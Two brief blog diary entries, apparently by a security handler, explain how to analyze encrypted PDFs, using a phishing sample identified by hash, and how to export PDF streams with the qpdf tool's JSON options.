And often, I have the answer without looking at the PDF: it's encrypted.

PDF documents can be encrypted, and what's special about encrypted PDFs, is that the structure of the PDF document is not encrypted. You can still see the objects, dictionaries, ... . What gets encrypted, are the strings and streams.

So my tools pdfid and pdf-parser can provide information about the structure of an encrypted PDF document, but not the strings and streams.

My PDF tools do not support encryption, you need to use another open source tool: qpdf, developed by Jay Berkenbilt.

A PDF document can be encrypted for DRM and/or for confidentiality. PDFs encrypted solely for DRM, can be opened and viewed by the user without providing a password. PDFs encrypted for confidentiality can only be opened and viewed when the user provides the correct password.

Let's take an example of a phishing PDF: 5c2764b9d3a6df67f99e342404e46a41ec6e1f5582919d5f99098d90fd45367f.

Analyzing this document with pdfid gives this:

The document is encrypted (/Encrypt is greater than 0) and it contains URIs (/URI is greater than 0).

qpdf can help you determine if a password is needed to view the content, like this:

If you get this output without providing a password, it means that the user password is empty and that the document can be opened without providing a password.

You must then decrypt the PDF with qpdf for further analysis like this:

And then it can be analyzed with pdf-parser to extract the URI like this:

If you don't decrypt the PDF prior to analysis with pdf-parser, the string of the URI will be ciphertext:

Didier Stevens
Senior handler
blog.DidierStevens.com

In diary entry "Analyzing PDF Streams" I answer a question asked by a student of Xavier: "how can you export all streams of a PDF?". I explained how to do this with my pdf-parser.py tool.

I recently found another method, using the open-source tool qpdf. Since version 11, you can extract streams with qpdf.

If you want the contents of the streams inside a single JSON object (BASE64 encoded), use this command:

qpdf.exe --json --json-stream-data=inline exampl.pdf

And if you want the contents of the streams in separate files (filename prefix "stream"), use this command:

qpdf.exe --json --json-stream-data=file --json-stream-prefix=stream exampl.pdf

Didier Stevens
Senior handler
blog.DidierStevens.com